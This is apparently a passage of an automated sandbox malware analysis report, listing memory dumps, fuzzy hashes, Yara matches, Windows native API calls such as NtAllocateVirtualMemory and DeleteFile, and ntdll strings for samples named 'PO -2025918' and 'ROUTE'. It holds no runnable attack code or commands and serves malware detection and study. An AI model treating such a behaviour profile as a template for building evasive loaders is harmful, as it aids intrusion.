                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1be75b50a29f848c1498c4d7538ea6003b7599d5e4fb0c727020961606e40734
                                                                                                                            • Instruction ID: 4b89701d8688c429ddcb1197dfad1e2112442f56f83cd6dd843a41eacf4dc3ce
                                                                                                                            • Opcode Fuzzy Hash: 1be75b50a29f848c1498c4d7538ea6003b7599d5e4fb0c727020961606e40734
                                                                                                                            • Instruction Fuzzy Hash: 1090022220584442D1047558540CA06004597D0205F55E051A1064596DC7398951A231
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5dcb367e5688f4c460b062f8e8a1180c8788df4c26b35ad07378b383bc9b6e9e
                                                                                                                            • Instruction ID: 35207cfab2b9103a0d6db771511ac1a724bb69556f485378c67ce54f7313018d
                                                                                                                            • Opcode Fuzzy Hash: 5dcb367e5688f4c460b062f8e8a1180c8788df4c26b35ad07378b383bc9b6e9e
                                                                                                                            • Instruction Fuzzy Hash: B290023220180402D1047598540C646004597E0301F55E051A5024556EC76989916231
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 92d65e0abf1d93590c00235ccac84db093c78ea5338dd997e6171813718ced7a
                                                                                                                            • Instruction ID: a102d73b31bcf3180307b161a2cc99f615f631962e6be8e372c5791a3c16a8f4
                                                                                                                            • Opcode Fuzzy Hash: 92d65e0abf1d93590c00235ccac84db093c78ea5338dd997e6171813718ced7a
                                                                                                                            • Instruction Fuzzy Hash: 4890023220180403D1047158550C707004597D0201F55E451A0424559DD75A89516221
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d5259d125c813800f1d263ab909f247aaece699d78aade1622fe6345d5fc70ed
                                                                                                                            • Instruction ID: f03294f152aca96f7fa4ba93e0f8b003fcb5f4c1c5471c201fbcac24fc4be422
                                                                                                                            • Opcode Fuzzy Hash: d5259d125c813800f1d263ab909f247aaece699d78aade1622fe6345d5fc70ed
                                                                                                                            • Instruction Fuzzy Hash: BF90022260580402D1447158541C706005597D0201F55E051A0024555DC75D8B5567A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d0341fcdf777278b5ea3c43563ae0a5603cfb5275d696f7ea9da91df9c6d971b
                                                                                                                            • Instruction ID: a4a099e668cc58467499295c04451a65eb6daeab48dbaa7e4fd8827379d3b7a7
                                                                                                                            • Opcode Fuzzy Hash: d0341fcdf777278b5ea3c43563ae0a5603cfb5275d696f7ea9da91df9c6d971b
                                                                                                                            • Instruction Fuzzy Hash: 8790023220180842D10471584408B46004597E0301F55D056A0124655DC719C9517621
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c67c3e6582fcd50982444c7fce182d7727de5ecfc9f08a90f96262183fc10101
                                                                                                                            • Instruction ID: 04cd429ad55c7c4cb59165d344cfa851d7c466eca3a97a5b6cb6fe42a0347741
                                                                                                                            • Opcode Fuzzy Hash: c67c3e6582fcd50982444c7fce182d7727de5ecfc9f08a90f96262183fc10101
                                                                                                                            • Instruction Fuzzy Hash: 60900222601800424144716888489064045BBE1211755D161A0998551DC75D89655765
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7bf44277d28b0d44f3da863c41d4884eacc3aed0161a8d9e9324b29412956783
                                                                                                                            • Instruction ID: 5ed812a8cc31fb0c17d45319b1cb43aa5c0683d591e4e3de998b411853b4acd9
                                                                                                                            • Opcode Fuzzy Hash: 7bf44277d28b0d44f3da863c41d4884eacc3aed0161a8d9e9324b29412956783
                                                                                                                            • Instruction Fuzzy Hash: F0900232201C0402D1047158480C747004597D0302F55D051A5164556EC769C9916631
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            Strings
                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01C046FC
                                                                                                                            • ExecuteOptions, xrefs: 01C046A0
                                                                                                                            • Execute=1, xrefs: 01C04713
                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01C04655
                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01C04787
                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01C04725
                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01C04742
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                            • API String ID: 0-484625025
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-$0$0
                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                            Strings
                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01C002E7
                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01C002BD
                                                                                                                            • RTL: Re-Waiting, xrefs: 01C0031E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                            • API String ID: 0-2474120054
                                                                                                                            Strings
                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01C07B7F
                                                                                                                            • RTL: Re-Waiting, xrefs: 01C07BAC
                                                                                                                            • RTL: Resource at %p, xrefs: 01C07B8E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 0-871070163
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C0728C
                                                                                                                            Strings
                                                                                                                            • RTL: Re-Waiting, xrefs: 01C072C1
                                                                                                                            • RTL: Resource at %p, xrefs: 01C072A3
                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01C07294
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-
                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$@
                                                                                                                            • API String ID: 0-1194432280

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                            Signature Coverage:1.4%
                                                                                                                            Total number of Nodes:510
                                                                                                                            Total number of Limit Nodes:76

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $&y$(J)$?U$L$VpX5$X5$l'$~p$)
                                                                                                                            • API String ID: 0-3944832665
                                                                                                                            • Opcode ID: 939e06caa41427aa9c884967f0a47be81d0530141a5c3b61c2e427d59a76ca6f
                                                                                                                            • Instruction ID: d5844c989e21f6e492c42d4bbc246f42bbcce95e4848586bf39d7310e48a8d94
                                                                                                                            • Opcode Fuzzy Hash: 939e06caa41427aa9c884967f0a47be81d0530141a5c3b61c2e427d59a76ca6f
                                                                                                                            • Instruction Fuzzy Hash: 85D1D1B0E05218CFEF24CF99C994B9DBBF2BF54308F20819AC0196B285D7755A89CF95
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 00AAC6E4
                                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 00AAC71F
                                                                                                                            • FindClose.KERNELBASE(?), ref: 00AAC72A
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3541575487-0
                                                                                                                            • Opcode ID: 0bcd0ed3e76a3e13bba6a3f69d416f9609b832d3224101b31c1df1672a9431be
                                                                                                                            • Instruction ID: 8d8fb73d400d2cdad22790095b6de4b4e54051573f074eb1953410778696b39e
                                                                                                                            • Opcode Fuzzy Hash: 0bcd0ed3e76a3e13bba6a3f69d416f9609b832d3224101b31c1df1672a9431be
                                                                                                                            • Instruction Fuzzy Hash: E53183B19003097BEB20DF60CD85FFB77BC9B95754F104558B908A7181EBB0AE94CBA0
                                                                                                                            APIs
                                                                                                                            • NtCreateFile.NTDLL(?,?,?,?,635CE8B4,?,?,?,?,?,?), ref: 00AB92CB
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 041070744bf495d413e60ee7f098dc23643cf720cfc8c4fd3fcc99ce66d5656b
                                                                                                                            • Instruction ID: ff23336a54efd1d2cef0bbb7ee1f17ac56110ba8bff7cc7f40171cb9ee3dbaae
                                                                                                                            • Opcode Fuzzy Hash: 041070744bf495d413e60ee7f098dc23643cf720cfc8c4fd3fcc99ce66d5656b
                                                                                                                            • Instruction Fuzzy Hash: 5D31C4B5A01248AFDB14DF99D881EEEB7F9EF8C710F108609F918A7241D670A851CFA5
                                                                                                                            APIs
                                                                                                                            • NtReadFile.NTDLL(?,?,?,?,635CE8B4,?,?,?,?), ref: 00AB9426
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: 19e5f510a2379a7b0105218b5c10e5d434f5aa5545959674cace4c4f58d775f2
                                                                                                                            • Instruction ID: ae77a8febf03430e44d75f4d44f87b57ff0bb1ca3ddbdc44a575e86a6417126f
                                                                                                                            • Opcode Fuzzy Hash: 19e5f510a2379a7b0105218b5c10e5d434f5aa5545959674cace4c4f58d775f2
                                                                                                                            • Instruction Fuzzy Hash: C631D6B5A00208AFDB14DF99D841EEFB7F9EF8C714F108509F918A7241D674A811CFA5
                                                                                                                            APIs
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00AA1DAB,?,00AB7FCE,00000000,635CE8B4,00003000,?,?,?,?,?,00AB7FCE,00AA1DAB), ref: 00AB9708
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2167126740-0
                                                                                                                            • Opcode ID: 291b8b0d8513af749782a9f3aaa48f50bade7b93b4a3b8851dfe6bbb34d5246b
                                                                                                                            • Instruction ID: 7e377c29b3f440e52606ced81725bd01a0f995bb843eda673913216659d3ceea
                                                                                                                            • Opcode Fuzzy Hash: 291b8b0d8513af749782a9f3aaa48f50bade7b93b4a3b8851dfe6bbb34d5246b
                                                                                                                            • Instruction Fuzzy Hash: B0211EB5A00249AFDB10DFA8DC42EEFB7BDEF88710F108509F918A7241D674A911CFA1
                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4033686569-0
                                                                                                                            • Opcode ID: 149bccc46e621c08124e4ae7e9c00c89c746301c5cbaa3a94d4c773a8c74d55c
                                                                                                                            • Instruction ID: 0912c14f37ff49ef27da12a48707aee266d78859f0ed7708a98abeb230c5c6f6
                                                                                                                            • Opcode Fuzzy Hash: 149bccc46e621c08124e4ae7e9c00c89c746301c5cbaa3a94d4c773a8c74d55c
                                                                                                                            • Instruction Fuzzy Hash: 5311A371A00644BED620EB68DC02FEF77ACDF88710F108509FA18A7182E7717501CBA5
                                                                                                                            APIs
                                                                                                                            • NtClose.NTDLL(00AB1801,?,-665E6599,?,?,00AB1801,?,00009D57), ref: 00AB9507
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0
                                                                                                                            • Opcode ID: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                                                            • Instruction ID: 1e6e0b3a80aef60008d84bc62a140c91a3e14832c5436c052e381371cb00454e
                                                                                                                            • Opcode Fuzzy Hash: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                                                            • Instruction Fuzzy Hash: C1E08C766002147BD620EA69DC41FDBB7ACDFC9720F518455FA0CA7242D672B9128BF0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 17d243e892a797c5f3dfa31b98d94dccb399d321638812bd83d70252b1c1bbc0
                                                                                                                            • Instruction ID: 879daf37759a9bc350f1aa4dc6358117329402a507942998154e0814d677bdf6
                                                                                                                            • Opcode Fuzzy Hash: 17d243e892a797c5f3dfa31b98d94dccb399d321638812bd83d70252b1c1bbc0
                                                                                                                            • Instruction Fuzzy Hash: C8900235655804139144B15C48C4546500597E1301B55C011E0424954CCB148A665365
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 20ff3ea6d94fc3b2953b70e295bbc546a6bfacd1a92a525ac47910fa010f43ac
                                                                                                                            • Instruction ID: 512d84c4b463ba19d1d08a4ec106bdcc7a1686b4ec3716526cf817b423cd80d7
                                                                                                                            • Opcode Fuzzy Hash: 20ff3ea6d94fc3b2953b70e295bbc546a6bfacd1a92a525ac47910fa010f43ac
                                                                                                                            • Instruction Fuzzy Hash: A8900265651504434144B15C4844406700597E2301395C115A0554960CC7188965926D
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 6f6823d668a495c1b070a329e7073bffeecfd91924da1724b9877caaa562b849
                                                                                                                            • Instruction ID: c0655e5ae010b81fe6da071466ca66cd4cef47aec7b65d6de6396af339aa83ab
                                                                                                                            • Opcode Fuzzy Hash: 6f6823d668a495c1b070a329e7073bffeecfd91924da1724b9877caaa562b849
                                                                                                                            • Instruction Fuzzy Hash: D2900265252404034109B15C4454616500A87E1201B55C021E1014990DC72589A16129
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 4cd15ff33d51b55f87ddb51f3f1745c58d8f66a1bd04751a364103d9b61d12f0
                                                                                                                            • Instruction ID: b6f695ea9c24011e793192b906089b58495d435d5985048bc05cd643efcdb8ee
                                                                                                                            • Opcode Fuzzy Hash: 4cd15ff33d51b55f87ddb51f3f1745c58d8f66a1bd04751a364103d9b61d12f0
                                                                                                                            • Instruction Fuzzy Hash: 9990023565540C03D154B15C4454746100587D1301F55C011A0024A54DC7558B6576A5
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 3566ae7d27a7813ef9619b2388feab57f5e250827791fce9db37ceba8620c362
                                                                                                                            • Instruction ID: 2720cdabd28980a5e12d76943e267ccb00fdd7ecfe8d3b2579bce2654a1017aa
                                                                                                                            • Opcode Fuzzy Hash: 3566ae7d27a7813ef9619b2388feab57f5e250827791fce9db37ceba8620c362
                                                                                                                            • Instruction Fuzzy Hash: 8490023525140C03D184B15C444464A100587D2301F95C015A0025A54DCB158B6977A5
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 9ddb74ae0f71b2c7c915246226240947d92a3eeeca517fd5f472584bcf5ea888
                                                                                                                            • Instruction ID: ca47b52876f54f5460513cb9bf20aa6e42f07d631836f0821589242c75d404c7
                                                                                                                            • Opcode Fuzzy Hash: 9ddb74ae0f71b2c7c915246226240947d92a3eeeca517fd5f472584bcf5ea888
                                                                                                                            • Instruction Fuzzy Hash: FD90023525544C43D144B15C4444A46101587D1305F55C011A0064A94DD7258E65B665
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
